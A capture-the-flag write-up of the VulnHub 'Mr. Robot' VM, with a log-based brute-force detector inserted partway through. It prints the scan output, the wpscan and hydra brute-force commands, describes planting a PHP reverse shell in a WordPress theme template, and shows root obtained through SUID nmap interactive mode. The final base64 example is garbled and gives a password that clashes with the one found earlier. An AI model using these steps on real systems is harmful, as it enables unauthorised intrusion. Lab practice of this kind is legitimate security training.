
VM 4 mr.Robot

Walkthru:
A. http://www.gcura.tech/vulnhub-mr-robot-1/ [WordPress, wpscan brute force, sort/uniq the pwd file, php reverse shell upload blocked, crack md5 pwd, search for files with the SUID bit set]

B. https://www.exploit-db.com/exploits/37292/ [local priv escalation which didn't work on execution. The exploit failed when run as ./ofs as daemon or as user robot]

C. https://www.exploit-db.com/exploits/41963/ [didn't work. Used Burp to intercept and modify the HTTP request. One time it kind of worked after I modified the request and got the option to email the link, but still not sure how to access the reset link if the system was able to send the request]

D. https://www.youtube.com/watch?v=vxFYfJbQAoc&has_verified=1 [shows that license.txt includes the user/pwd for user elliot, which I did not see in the app, but shows a way to decode it using the OS]

E. https://aisherwood.gitbooks.io/reference-book/content/mr-robot.html [extract username from VM wiki site using cewl, use hydra to crack the pwd, use metasploit for reverse shell]

F. https://anandsecurity.blogspot.in/2016/08/ctf-mr-robot-1-challenge.html [use burp brute force to get username]

G. https://www.vulnhub.com/entry/mr-robot-1,151/ [other solutions]

Notes:
1. Scan shows:
root@kali:~# nmap -sV 192.168.182.158

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2017-03-29 00:14 CDT
Nmap scan report for 192.168.182.158
Host is up (0.00033s latency).
Not shown: 997 filtered ports
PORT    STATE  SERVICE  VERSION
22/tcp  closed ssh
80/tcp  open   http     Apache httpd
443/tcp open   ssl/http Apache httpd
MAC Address: 00:0C:29:29:A5:14 (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.26 seconds
root@kali:~# 
2. Looks like the victim is running Apache on ports 80/tcp and 443/tcp, so it is safe to assume we will be pwning a web server. Let's do some further scanning of the victim with nikto to find any vulnerabilities on the system.
root@kali:~# nikto -h 192.168.182.158
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.182.158
+ Target Hostname:    192.168.182.158
+ Target Port:        80
+ Start Time:         2017-03-29 02:25:24 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-powered-by header: PHP/5.5.29
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Server leaks inodes via ETags, header found with file /robots.txt, fields: 0x29 0x52467010ef8ad 
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html, index.php
+ OSVDB-3092: /admin/: This might be interesting...
+ Uncommon header 'link' found, with contents: ; rel=shortlink
+ /readme.html: This WordPress file reveals the installed version.
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /admin/index.html: Admin login page/section found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login/: Admin login page/section found.
+ /wordpress/: A WordPress installation was found.
+ /wp-admin/wp-login.php: WordPress login found
+ /blog/wp-login.php: WordPress login found
+ /wp-login.php: WordPress login found
+ 7535 requests: 0 error(s) and 18 item(s) reported on remote host
+ End Time:           2017-03-29 02:28:48 (GMT-5) (204 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
3. With nikto I was able to see that it is a WordPress site. I also see the /wp-login.php, readme.html, license.txt, and robots.txt files, which look pretty interesting. Before we check these files, let's browse the web server and see what it gives us.

4. Well, the server gives us a fancy intro, then a message and a list of commands that we can run. None of them were that interesting except the join command, which asks for your email to "join" them. I didn't put in any email. Instead I looked into the files stated earlier. Let's check them out!

5. BINGO! Found the first key, which turned out to be 073403c8a58a1f80d943455fb30724b9, and also found a file called fsocity.dic. It turns out to be a dictionary file. Maybe we will use this later? For now let's save the file and continue with the attack.
Key 1:
073403c8a58a1f80d943455fb30724b9

6. Well, according to the readme.html file the victim is running WordPress Version 4.3.9.
6a. Another file, revealed via Nikto/Dirb, shows a different version. Logging in to WP later confirms that the other version is the correct one.

7. I checked the license.txt file but found nothing of interest in there. Now let's check out /wp-login.php/.

8. When viewing the page, I decided to see if there were any default usernames and passwords by inputting admin:admin, but it said the username was invalid. However, having watched the show and knowing that the main character is elliot, I decided to input elliot as the username and password. [Not sure how we guessed the username]

9. Looks like we are on to something! I got the password wrong, but WordPress confirms that elliot is a username on the site (the error message differs for an unknown user and for a wrong password). I will be doing a dictionary attack on WordPress using the fsocity.dic I acquired earlier. Before I do the dictionary attack, I will try to make the password list smaller using the commands listed below. This will make the attack go faster when trying to acquire elliot's password. [sort -u is for unique]
root@kali:~/Documents# wc -l fsocity.dic 
858160 fsocity.dic
root@kali:~/Documents# cat fsocity.dic | sort -u | wc -l 
11451
root@kali:~/Documents# cat fsocity.dic | sort -u | uniq > Newfsocity.dic
10. I was able to cut the dictionary down from 858160 words to 11451 and saved the shorter dictionary to Newfsocity.dic. Now let's use wpscan to get elliot's password. [You may have to give the exact path for the wordlist file]
root@kali:~# wpscan --url 192.168.182.158 --wordlist /root/Documents/Newfsocity.dic --username elliot
_______________________________________________________________
        __          _______   _____                  
        \ \        / /  __ \ / ____|                 
         \ \  /\  / /| |__) | (___   ___  __ _ _ __  
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \ 
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team 
                       Version 2.8
          Sponsored by Sucuri - https://sucuri.net
   @_WPScan_, @ethicalhack3r, @erwan_lr, pvdl, @_FireFart_
_______________________________________________________________

[+] URL: http://192.168.182.158/
[+] Started: Wed Mar 29 02:07:39 2017

[+] robots.txt available under: 'http://192.168.182.158/robots.txt'
[!] The WordPress 'http://192.168.182.158/readme.html' file exists exposing a version number
[+] Interesting header: SERVER: Apache
[+] Interesting header: X-FRAME-OPTIONS: SAMEORIGIN
[+] Interesting header: X-MOD-PAGESPEED: 1.9.32.3-4523
[+] XML-RPC Interface available under: http://192.168.182.158/xmlrpc.php

[+] WordPress version 4.3.9 identified from rss generator

[+] Enumerating plugins from passive detection ...
[+] No plugins found
[+] Starting the password brute forcer
  Brute Forcing 'elliot' Time: 00:02:02 <====================================                                      > (5634 / 11452) 49.19%  ETA: 00:02:07
  [+] [SUCCESS] Login : elliot Password : ER28-0652


  +----+--------+------+-----------+
  | Id | Login  | Name | Password  |
  +----+--------+------+-----------+
  |    | elliot |      | ER28-0652 |
  +----+--------+------+-----------+

[+] Finished: Wed Mar 29 02:09:43 2017
[+] Requests Done: 5694
[+] Memory used: 29.953 MB
[+] Elapsed time: 00:02:04
root@kali:~/Downloads# 
11. Nice! Elliot's password is ER28-0652. Now let's log in.
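The wpscan run above fired 5694 requests at wp-login.php in about two minutes, which is exactly the pattern a web server log should flag. The following detector, added here as an example and not part of the original walkthrough, parses Apache combined-format access log lines (the sample lines are constructed, using the attacker/victim addresses from this write-up) and reports any source IP with more failed WordPress logins in a sliding window than a threshold allows.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache combined log format: ip ident user [timestamp] "METHOD path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return a dict for one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), TS_FMT),
        "method": m.group("method"),
        "path": m.group("path").split("?")[0],
        "status": int(m.group("status")),
    }


def wp_login_bursts(lines, threshold=20, window=timedelta(seconds=60)):
    """Map source IP -> max number of failed wp-login.php POSTs seen inside
    any sliding `window`, for IPs whose maximum exceeds `threshold`.
    WordPress re-renders the login form with HTTP 200 on a failed login and
    answers 302 on success, so only 200 responses count as failures."""
    failures = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if (rec and rec["method"] == "POST"
                and rec["path"].endswith("/wp-login.php") and rec["status"] == 200):
            failures[rec["ip"]].append(rec["ts"])
    flagged = {}
    for ip, times in failures.items():
        times.sort()
        start, best = 0, 0
        for end, t in enumerate(times):        # classic two-pointer sliding window
            while t - times[start] > window:
                start += 1
            best = max(best, end - start + 1)
        if best > threshold:
            flagged[ip] = best
    return flagged


# Constructed sample: 25 failed logins from the Kali box within 20 seconds,
# one successful login from another host, and a line that should be ignored.
SAMPLE_LOG = [
    f'192.168.182.147 - - [29/Mar/2017:02:07:{39 + i % 20:02d} -0500] '
    f'"POST /wp-login.php HTTP/1.1" 200 3564' for i in range(25)
] + [
    '10.0.0.5 - - [29/Mar/2017:02:07:40 -0500] "POST /wp-login.php HTTP/1.1" 302 0',
    '10.0.0.5 - - [29/Mar/2017:02:07:41 -0500] "GET /wp-admin/ HTTP/1.1" 200 9812',
    'junk line that does not parse',
]

if __name__ == "__main__":
    print(wp_login_bursts(SAMPLE_LOG))   # {'192.168.182.147': 25}
```

Point it at a real access.log with `wp_login_bursts(open("access.log"))`; the threshold and window are deliberately conservative and should be tuned to the site's normal login rate.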

Looks like the WP version is actually 4.3.16.

12. It worked! There are many things I can do from here, like checking which installed plugins are vulnerable so we can exploit them, but since elliot is the Administrator, I am going to try to upload a php file to get a reverse shell.
Note: I got the php-reverse-shell from pentestmonkey. The link to the file can be located here. Also, before uploading the file, make sure to edit the ip variable and the port variable. In my case my IP is 192.168.182.147 and the port I will use is 1234.
14. Well, looks like WordPress is set up to block my php file from uploading. They probably have wp-config.php set up this way. It's all good, I still have another trick up my sleeve. Let's edit one of the theme pages and put the code from the php-reverse-shell file in there instead. Go to Appearance -> Editor -> 404 Template. Add the code to the bottom and click Update File. It should look like the picture below.

15. Now set up the listener to catch the reverse shell.
16. Visit /wordpress/wp-content/themes/twentyfifteen/404.php from the browser, which should get you a shell. Got a shell back as the user daemon.
17. Used the code below to spawn a tty shell.
python -c 'import pty; pty.spawn("/bin/sh")'
18. With that I snooped around and found key 2 in the /home/robot/ directory, but got permission denied. I would have to be the robot user (or root) to view it. However, I did find a password.raw-md5 file. Maybe this is a password to log in as robot? Let's open the file up.
$ ls
ls
key-2-of-3.txt password.raw-md5
$ ls -l
ls -l
total 8
-r-------- 1 robot robot 33 Nov 13  2015 key-2-of-3.txt
-rw-r--r-- 1 robot robot 39 Nov 13  2015 password.raw-md5
$ cat password.raw-md5
cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b
$ 
19. BINGO! I have the password hash for robot. I used crackstation.net to crack the password, which turned out to be abcdefghijklmnopqrstuvwxyz. Alright, let's log in as robot.
$ su - robot
su - robot
Password: abcdefghijklmnopqrstuvwxyz

$ whoami
whoami
robot
$ id
id
uid=1002(robot) gid=1002(robot) groups=1002(robot)
$ 
20. Now that we are logged in as robot, let's get our 2nd key.
$ pwd
pwd
/home/robot
$ ls  
ls
key-2-of-3.txt password.raw-md5
$ cat key-2-of-3.txt
cat key-2-of-3.txt
822c73956184f694993bede3eb39f959
$ 
2nd Key:
822c73956184f694993bede3eb39f959
21. Got our 2nd key. Now let's try to get root! Let's find any files that have the SUID bit set.
$  find / -perm -4000 2>/dev/null
 find / -perm -4000 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown
$ 
22. Well, looks like we can run nmap as root since it has the SUID bit set. Let's check the version of nmap to see if it still supports interactive mode.
$ /usr/local/bin/nmap --version
/usr/local/bin/nmap --version

nmap version 3.81 ( http://www.insecure.org/nmap/ )
$ 
23. Nmap is version 3.81, which still supports interactive mode. We can use this to execute shell commands and get a root shell. Found a useful post on this called Why You Can't Un-Root a Compromised Machine.
Check it out. It's very helpful. Now let's get our root shell and our last key.
$ nmap --interactive
nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h  for help
nmap> !sh
!sh
# whoami
whoami
root
# id
id
uid=1002(robot) gid=1002(robot) euid=0(root) groups=0(root),1002(robot)
# 
24. We got a root shell! Let's go to the root directory and get our last key.
# find / -name 'key*.txt'      (or simply:)
# cd /root
cd /root
# ls
ls
firstboot_done key-3-of-3.txt
# cat key-3-of-3.txt
cat key-3-of-3.txt
04787ddef27c3dee1ee161b21670b4e4
Key 3:
04787ddef27c3dee1ee161b21670b4e4

============================================================
E. https://aisherwood.gitbooks.io/reference-book/content/mr-robot.html [extract username from VM wiki site using cewl, use hydra to crack the pwd, use metasploit for reverse shell]
> cewl <wikipedia url> -d 0 -w userList
> hydra -L userList -P passList 192.168.100.181 http-form-post \
"/wp-login.php:log=^USER^&pwd=^PASS^:login_error"

=======================================================
D. https://www.youtube.com/watch?v=vxFYfJbQAoc&has_verified=1 [shows that license.txt includes the user/pwd for user elliot, which I did not see in the app, but shows a way to decode it using the OS]
Kali> echo 1231231amxlau89013n,ma789= |base64 -d
elliot=ER28-0852
